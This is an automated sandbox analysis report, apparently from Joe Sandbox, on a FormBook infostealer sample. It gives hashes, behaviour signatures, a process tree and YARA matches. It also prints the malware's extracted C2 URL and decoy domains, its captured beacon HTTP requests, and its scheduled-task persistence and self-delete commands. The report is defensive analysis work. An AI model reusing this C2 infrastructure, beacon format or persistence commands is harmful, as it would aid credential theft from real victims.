Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO_210223.exe

Overview

General Information

Sample Name:PO_210223.exe
Analysis ID:356494
MD5:e40af9745e938b72d5d860bbc679aebf
SHA1:d9e750061417b0ca9f933db79c99c12934abbe84
SHA256:38acc90cd6d33b61b99cca8cf06781e1bd2ab8ffebc3a33e036eca36037d413b
Tags:exeFormbookgeoKOR

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO_210223.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\PO_210223.exe' MD5: E40AF9745E938B72D5D860BBC679AEBF)
    • schtasks.exe (PID: 1556 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 1744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO_210223.exe (PID: 1868 cmdline: C:\Users\user\Desktop\PO_210223.exe MD5: E40AF9745E938B72D5D860BBC679AEBF)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 7112 cmdline: /c del 'C:\Users\user\Desktop\PO_210223.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.000666dy.com/ntg/"], "decoy": ["successwithyolandafgreen.com", "theordinaryph.com", "atamyo-therapeutics.com", "pophazard.com", "anthonyfultz.com", "pasanglham.com", "kanekhushi.com", "littlefishyswim.com", "kaieteurny.com", "fanavartima.com", "digexpo.com", "se-rto.com", "chaos.finance", "bakldx.com", "after-school.pro", "faithfromphilly.com", "estudiomuradian.com", "albertocerasini.com", "andronna.com", "wingspotusa.com", "lucky-lucky.online", "ga-don.com", "shawnbly.com", "shoptalullah.com", "needfulvegan.com", "ampersandaconsulting.com", "hoyhelp.com", "wickfordinternists.com", "kindlovingmindfulyoga.com", "hhkgjt.net", "eventpubgpharaoh.com", "blameitonpizza.com", "editshirt.com", "utulocal194.com", "meralpro.com", "rochesterhindus.com", "wadihassafi.com", "visitouroffice.com", "duncantraining.com", "ggrealestategroup.com", "xrf-tech.com", "pro-tizer.com", "usesoft.icu", "caralsalem.com", "inudaipur.com", "fluid-branding.com", "titizadiyamancigkofte.com", "es-tucasa.com", "103manningave.com", "eclat-beauty.info", "ahameeting2021.com", "gsyxh.com", "246835.com", "onwardfpv.com", "estasinvitado.net", "kinderkakery.com", "bala5.com", "gehqaralouine.com", "editorialesrd.com", "thebarconcepts.com", "aleitzeventdecor.com", "moderaty.com", "geraloqaresuine.com", "kyotodreaming.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PO_210223.exe.2cb671c.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0.2.PO_210223.exe.45c8e00.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.PO_210223.exe.45c8e00.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xe6998:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xe6c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x112fb8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x113222:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xf2725:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11ed45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xf2211:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x11e831:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xf2827:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x11ee47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xf299f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x11efbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xe761a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x113c3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0xf148c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x11daac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xe8313:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x114933:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0xf83c7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1249e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0xf93ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          0.2.PO_210223.exe.45c8e00.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0xf54a9:$sqlite3step: 68 34 1C 7B E1
          • 0xf55bc:$sqlite3step: 68 34 1C 7B E1
          • 0x121ac9:$sqlite3step: 68 34 1C 7B E1
          • 0x121bdc:$sqlite3step: 68 34 1C 7B E1
          • 0xf54d8:$sqlite3text: 68 38 2A 90 C5
          • 0xf55fd:$sqlite3text: 68 38 2A 90 C5
          • 0x121af8:$sqlite3text: 68 38 2A 90 C5
          • 0x121c1d:$sqlite3text: 68 38 2A 90 C5
          • 0xf54eb:$sqlite3blob: 68 53 D8 7F 8C
          • 0xf5613:$sqlite3blob: 68 53 D8 7F 8C
          • 0x121b0b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x121c33:$sqlite3blob: 68 53 D8 7F 8C
          9.2.PO_210223.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 8 entries

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Scheduled temp file as task from temp locationShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\PO_210223.exe' , ParentImage: C:\Users\user\Desktop\PO_210223.exe, ParentProcessId: 6976, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kwqifureL' /XML 'C:\Users\user\AppData\Local\Temp\tmp33D2.tmp', ProcessId: 1556

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 0.2.PO_210223.exe.45c8e00.3.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.000666dy.com/ntg/"], "decoy": ["successwithyolandafgreen.com", "theordinaryph.com", "atamyo-therapeutics.com", "pophazard.com", "anthonyfultz.com", "pasanglham.com", "kanekhushi.com", "littlefishyswim.com", "kaieteurny.com", "fanavartima.com", "digexpo.com", "se-rto.com", "chaos.finance", "bakldx.com", "after-school.pro", "faithfromphilly.com", "estudiomuradian.com", "albertocerasini.com", "andronna.com", "wingspotusa.com", "lucky-lucky.online", "ga-don.com", "shawnbly.com", "shoptalullah.com", "needfulvegan.com", "ampersandaconsulting.com", "hoyhelp.com", "wickfordinternists.com", "kindlovingmindfulyoga.com", "hhkgjt.net", "eventpubgpharaoh.com", "blameitonpizza.com", "editshirt.com", "utulocal194.com", "meralpro.com", "rochesterhindus.com", "wadihassafi.com", "visitouroffice.com", "duncantraining.com", "ggrealestategroup.com", "xrf-tech.com", "pro-tizer.com", "usesoft.icu", "caralsalem.com", "inudaipur.com", "fluid-branding.com", "titizadiyamancigkofte.com", "es-tucasa.com", "103manningave.com", "eclat-beauty.info", "ahameeting2021.com", "gsyxh.com", "246835.com", "onwardfpv.com", "estasinvitado.net", "kinderkakery.com", "bala5.com", "gehqaralouine.com", "editorialesrd.com", "thebarconcepts.com", "aleitzeventdecor.com", "moderaty.com", "geraloqaresuine.com", "kyotodreaming.com"]}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\kwqifureL.exeReversingLabs: Detection: 42%
            Multi AV Scanner detection for submitted fileShow sources
            Source: PO_210223.exeVirustotal: Detection: 31%Perma Link
            Source: PO_210223.exeReversingLabs: Detection: 42%
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000009.00000002.715452206.0000000001180000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907288680.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907602619.0000000000D90000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.907432455.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.715862611.00000000016B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.681205179.0000000004429000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.PO_210223.exe.45c8e00.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.PO_210223.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.PO_210223.exe.4573fe0.2.raw.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\kwqifureL.exeJoe Sandbox ML: detected
            Machine Learning detection for sampleShow sources
            Source: PO_210223.exeJoe Sandbox ML: detected
            Source: 9.2.PO_210223.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\PO_210223.exeUnpacked PE file: 0.2.PO_210223.exe.890000.0.unpack
            Uses 32bit PE filesShow sources
            Source: PO_210223.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
            Source: PO_210223.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Binary contains paths to debug symbolsShow sources
            Source: Binary string: ipconfig.pdb source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
            Source: Binary string: ipconfig.pdbGCTL source: PO_210223.exe, 00000009.00000002.715896040.00000000016E0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_210223.exe, 00000009.00000002.716018199.00000000017E0000.00000040.00000001.sdmp, ipconfig.exe, 0000000D.00000002.908995826.0000000003430000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: PO_210223.exe, ipconfig.exe
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.691413999.0000000005A00000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\PO_210223.exeCode function: 4x nop then pop edi
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.000666dy.com/ntg/
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.pophazard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.246835.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.kaieteurny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 204.11.56.48 204.11.56.48
            Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
            Source: Joe Sandbox ViewASN Name: CNSERVERSUS CNSERVERSUS
            Source: C:\Windows\explorer.exeCode function: 10_2_04E0E782 getaddrinfo,setsockopt,recv,
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=ezEzfTUVqdhTeHhhSUO1nROjhCSdyq2ILgetv621tco9QxJ0Ek6h+l0QSU1+LT7ErdbR&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.pophazard.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=w4X+hAUHJfroJmp94c1onPOAPenZZpTxtRzXhSWsn9e2URXOAMjiMifVYC4X6954J+Dz&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.246835.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /ntg/?ojoHzZ=bxqEOtZwpu8QOdqfa5M05y7zdw+lGZ3K+8kzjODwarG6Nc6O9nhCMo5PAGRXJYSnY3HU&1bm=GPD0lNKPfFHTAb HTTP/1.1Host: www.kaieteurny.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: unknownDNS traffic detected: queries for: www.pophazard.com
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000003.646155016.000000000826B000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/arrow.png)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libg.png)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/libgh.png)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/logo.png)
            Source: ipconfig.exe, 0000000D.00000002.911031033.0000000003E4F000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)
            Source: PO_210223.exe, 00000000.00000002.680445109.0000000002C2D000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000A.00000002.910436982.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comcy
            Source: PO_210223.exe, 00000000.00000003.648155639.000000000828D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comig
            Source: PO_210223.exe, 00000000.00000003.648075554.000000000828D000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comint
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comk
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva9y
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: PO_210223.exe, 00000000.00000003.652634958.0000000008285000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmp, PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: PO_210223.exe, 00000000.00000003.654377069.0000000008285000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersQ
            Source: PO_210223.exe, 00000000.00000003.658906996.0000000008285000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerse
            Source: PO_210223.exe, 00000000.00000003.658952636.0000000008285000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersiva
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: PO_210223.exe, 00000000.00000003.645891455.000000000826B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comc
            Source: PO_210223.exe, 00000000.00000003.645842271.000000000826B000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comic
            Source: PO_210223.exe, 00000000.00000003.648938805.0000000008252000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: PO_210223.exe, 00000000.00000003.647755183.0000000008255000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnal
            Source: PO_210223.exe, 00000000.00000003.647493837.0000000008252000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnal9y
            Source: PO_210223.exe, 00000000.00000003.647129278.0000000008256000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnt7o
            Source: PO_210223.exe, 00000000.00000002.686743124.0000000009462000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.696926398.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
